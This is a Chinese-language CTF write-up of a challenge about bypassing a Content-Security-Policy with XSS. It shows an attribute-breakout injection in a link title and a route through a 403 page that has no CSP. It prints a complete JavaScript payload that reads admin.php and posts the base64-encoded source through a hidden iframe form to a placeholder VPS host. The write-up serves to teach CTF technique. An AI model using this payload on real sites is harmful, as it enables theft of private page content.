一道CSP相关的题
0x01 题目描述
打开后,有四个页面:
登录页面:login
注册页面:register
bug提交页面:bug report
admin页面:admin page
admin页面需要权限才能看,结合提示:csp,思路就比较清晰了:
- 注册后,在user.php页面找到可以xss的点
- 然后插入我们的xss脚本,提交给bugreport页面
- 通过后台的bot访问我们的xss页面,便可打到cookie或者网页源码
随便注册个账号,登录后user页面如下:
发现有两个输入点,但经过测试发现编辑article,会经过html实体转义,这样 “ 和 < > 等就会被直接转义,没办法达到一个闭合的效果。如下:
虽然没办法闭合,但是我们在网页源码里面发现一个hidden的input标签,这种hidden的一般比较可疑,这时我们可以对网页的js文件进行分析(xss相关的题大多数都是需要注意网页自带的js文件),一共三个js文件:
oneshuttle.js:
let js_list = [];
let addad = document.createElement('script');
addad.setAttribute('src', 'js/addad.js');
js_list.push(addad);
window.onload = function() {
for (let j of js_list) {
this.document.body.appendChild(j);
}
}
这个页面用来将<script src="js/addad.js"></script>; 加入到网页body里。
addad.js:
function add_the_fucking_ad() {
let new_window_url = this.href;
let ad_js = document.getElementById('ad').value;
w = window.open(new_window_url);
let sct = w.document.createElement('script');
sct.src = ad_js;
w.onload = (() => w.document.body.appendChild(sct));
return false;
}
let a_tags = document.getElementsByTagName('a');
for (let a_tag of a_tags) {
a_tag.onclick = add_the_fucking_ad;
}
这个js用来获取id = ad的值,然后创建script标签,将script src的值设为ad的值,并为每个新开的
<a>标签页面添加这个js文件,如果ad的值可控,那么这就可以添加我们自己脚本到每个页面了。
第三个js文件没有什么有用的信息,所以内容就是这两个js文件了,那么ad值在哪呢?注意到url:
有个参数是ad,先base64解码一下:js/advertising.js,看来就是通过这个ad添加js了。尝试控制ad的值:
value可以控制,但是由于html实体转义,并不能成功的闭合标签。所以value这里并不能利用。这时有点脑塞了,于是去问了下出题人,出题人提示:title有xss点。title??那我们就回过头看看user页面title:
从图中可以看到,a标签的title属性是和我们提交的内容有关的,继续查看源码:
可以看到title是由单引号闭合的,我们尝试一下闭合单引号,引入href将原来的href覆盖:
在article content框中输入:' href='admin.php' ' 可以看到title被闭合,href的值成功的被指向我们输入的页面:
但是,我们似乎忘记了这是一道csp题目,虽然我们可以控制href属性,但是没办法内联执行js,这也没什么用啊,回过头,先看看response header是怎么定义csp的:
Content-Security-Policy:default-src 'self' ;base-uri 'none'; obejct-src 'none'
这条意思:只执行本域的js,如:<script src="xxx"></script>,连内联js都不行,同时
X-Frame-Options:deny表示不允许被iframe包含,X-XSS-Protection:1;mode=block 表示
如果页面有植入xss痕迹,则不渲染那条script语句,这三者相加,虽然没有nonce这种随机数,但想在
本页面植入并执行js代码是不可能的,头皮发麻,怎么绕?搜了半天,还是没搜到相应的解决办法,
唯一搜到的便是一则google的xss,通过一个没有csp的页面来绕过,当时,还没反应过来,于是去问出题
人,出题人:你找本域一些没有csp的页面啊,像403、400、404这种一般都没有,卧槽,当时就反
应过来了:通过没有csp的页面来绕过。这下子思路便是超级清晰了:
1.根据前面我们看到addad.js会将ad的内容加入到页面内,这就为我们插入<script>标签提供前提条件
2.user页面的<a>标签的href属性我们可以控制,这样我们就可以指向那个插入了恶意js代码的403页面
3.将user页面的url提交到bugreport页面,让bot访问,拿admin源码(ps:这里为什么不拿cookie呢,因为:httponly为true)
0x02 payload 构造
在vps上放如下代码:
</pre>
var cr;
if (document.charset) {
cr = document.charset
} else if (document.characterSet) {
cr = document.characterSet
};
function createXmlHttp() {
if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest()
} else {
var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
for (var n = 0; n < MSXML.length; n++) {
try {
xmlHttp = new ActiveXObject(MSXML[n]);
break
} catch (e) {
}
}
}
}
createXmlHttp();
xmlHttp.onreadystatechange = writeSource;
xmlHttp.open('GET', '../admin.php', true);
xmlHttp.send(null);
function writeSource() {
if (xmlHttp.readyState == 4) {
var code = BASE64.encoder(xmlHttp.responseText);
xssPost('http://yourVps:xxx/', code);
}
}
function xssPost(url, postStr) {
var de;
de = document.body.appendChild(document.createElement('iframe'));
de.src = 'about:blank';
de.height = 1;
de.width = 1;
de.contentDocument.write('
<form method="POST" action="' + url + '"><input name="code" value="' + postStr + '"/></form>
');
de.contentDocument.forms[0].submit();
de.style.display = 'none';
}
/**
*create by 2012-08-25 pm 17:48
*@author hexinglun@gmail.com
*BASE64 Encode and Decode By UTF-8 unicode
*可以和java的BASE64编码和解码互相转化
*/
(function(){
var BASE64_MAPPING = [
'A','B','C','D','E','F','G','H',
'I','J','K','L','M','N','O','P',
'Q','R','S','T','U','V','W','X',
'Y','Z','a','b','c','d','e','f',
'g','h','i','j','k','l','m','n',
'o','p','q','r','s','t','u','v',
'w','x','y','z','0','1','2','3',
'4','5','6','7','8','9','+','/'
];
/**
*ascii convert to binary
*/
var _toBinary = function(ascii){
var binary = new Array();
while(ascii > 0){
var b = ascii%2;
ascii = Math.floor(ascii/2);
binary.push(b);
}
/*
var len = binary.length;
if(6-len > 0){
for(var i = 6-len ; i > 0 ; --i){
binary.push(0);
}
}*/
binary.reverse();
return binary;
};
/**
*binary convert to decimal
*/
var _toDecimal = function(binary){
var dec = 0;
var p = 0;
for(var i = binary.length-1 ; i >= 0 ; --i){
var b = binary[i];
if(b == 1){
dec += Math.pow(2 , p);
}
++p;
}
return dec;
};
/**
*unicode convert to utf-8
*/
var _toUTF8Binary = function(c , binaryArray){
var mustLen = (8-(c+1)) + ((c-1)*6);
var fatLen = binaryArray.length;
var diff = mustLen - fatLen;
while(--diff >= 0){
binaryArray.unshift(0);
}
var binary = [];
var _c = c;
while(--_c >= 0){
binary.push(1);
}
binary.push(0);
var i = 0 , len = 8 - (c+1);
for(; i < len ; ++i){
binary.push(binaryArray[i]);
}
for(var j = 0 ; j < c-1 ; ++j){ binary.push(1); binary.push(0); var sum = 6; while(--sum >= 0){
binary.push(binaryArray[i++]);
}
}
return binary;
};
var __BASE64 = {
/**
*BASE64 Encode
*/
encoder:function(str){
var base64_Index = [];
var binaryArray = [];
for(var i = 0 , len = str.length ; i < len ; ++i){
var unicode = str.charCodeAt(i);
var _tmpBinary = _toBinary(unicode);
if(unicode < 0x80){ var _tmpdiff = 8 - _tmpBinary.length; while(--_tmpdiff >= 0){
_tmpBinary.unshift(0);
}
binaryArray = binaryArray.concat(_tmpBinary);
}else if(unicode >= 0x80 && unicode <= 0x7FF){ binaryArray = binaryArray.concat(_toUTF8Binary(2 , _tmpBinary)); }else if(unicode >= 0x800 && unicode <= 0xFFFF){//UTF-8 3byte binaryArray = binaryArray.concat(_toUTF8Binary(3 , _tmpBinary)); }else if(unicode >= 0x10000 && unicode <= 0x1FFFFF){//UTF-8 4byte binaryArray = binaryArray.concat(_toUTF8Binary(4 , _tmpBinary)); }else if(unicode >= 0x200000 && unicode <= 0x3FFFFFF){//UTF-8 5byte binaryArray = binaryArray.concat(_toUTF8Binary(5 , _tmpBinary)); }else if(unicode >= 4000000 && unicode <= 0x7FFFFFFF){//UTF-8 6byte
binaryArray = binaryArray.concat(_toUTF8Binary(6 , _tmpBinary));
}
}
var extra_Zero_Count = 0;
for(var i = 0 , len = binaryArray.length ; i < len ; i+=6){ var diff = (i+6)-len; if(diff == 2){ extra_Zero_Count = 2; }else if(diff == 4){ extra_Zero_Count = 4; } //if(extra_Zero_Count > 0){
// len += extra_Zero_Count+1;
//}
var _tmpExtra_Zero_Count = extra_Zero_Count;
while(--_tmpExtra_Zero_Count >= 0){
binaryArray.push(0);
}
base64_Index.push(_toDecimal(binaryArray.slice(i , i+6)));
}
var base64 = '';
for(var i = 0 , len = base64_Index.length ; i < len ; ++i){
base64 += BASE64_MAPPING[base64_Index[i]];
}
for(var i = 0 , len = extra_Zero_Count/2 ; i < len ; ++i){
base64 += '=';
}
return base64;
},
/**
*BASE64 Decode for UTF-8
*/
decoder : function(_base64Str){
var _len = _base64Str.length;
var extra_Zero_Count = 0;
/**
*计算在进行BASE64编码的时候,补了几个0
*/
if(_base64Str.charAt(_len-1) == '='){
//alert(_base64Str.charAt(_len-1));
//alert(_base64Str.charAt(_len-2));
if(_base64Str.charAt(_len-2) == '='){//两个等号说明补了4个0
extra_Zero_Count = 4;
_base64Str = _base64Str.substring(0 , _len-2);
}else{//一个等号说明补了2个0
extra_Zero_Count = 2;
_base64Str = _base64Str.substring(0 , _len - 1);
}
}
var binaryArray = [];
for(var i = 0 , len = _base64Str.length; i < len ; ++i){
var c = _base64Str.charAt(i);
for(var j = 0 , size = BASE64_MAPPING.length ; j < size ; ++j){ if(c == BASE64_MAPPING[j]){ var _tmp = _toBinary(j); /*不足6位的补0*/ var _tmpLen = _tmp.length; if(6-_tmpLen > 0){
for(var k = 6-_tmpLen ; k > 0 ; --k){
_tmp.unshift(0);
}
}
binaryArray = binaryArray.concat(_tmp);
break;
}
}
}
if(extra_Zero_Count > 0){
binaryArray = binaryArray.slice(0 , binaryArray.length - extra_Zero_Count);
}
var unicode = [];
var unicodeBinary = [];
for(var i = 0 , len = binaryArray.length ; i < len ; ){
if(binaryArray[i] == 0){
unicode=unicode.concat(_toDecimal(binaryArray.slice(i,i+8)));
i += 8;
}else{
var sum = 0;
while(i < len){ if(binaryArray[i] == 1){ ++sum; }else{ break; } ++i; } unicodeBinary = unicodeBinary.concat(binaryArray.slice(i+1 , i+8-sum)); i += 8 - sum; while(sum > 1){
unicodeBinary = unicodeBinary.concat(binaryArray.slice(i+2 , i+8));
i += 8;
--sum;
}
unicode = unicode.concat(_toDecimal(unicodeBinary));
unicodeBinary = [];
}
}
return unicode;
}
};
window.BASE64 = __BASE64;
})();
<pre>
这时一个通用的拖源码的js代码,取自xssplatform,只需更改24行的文件名和28行的vps地址就行。
然后通过user页面的输入vps地址,再通过addad.js为403页面添加js脚本:(这里我找到/js/这个目录是403)
成功添加/js/页面,然后继续修改ad的值为我们的vps上js文件的url:
在最下面可以看到成功添加了任意js文件,最后在vps上收到flag:
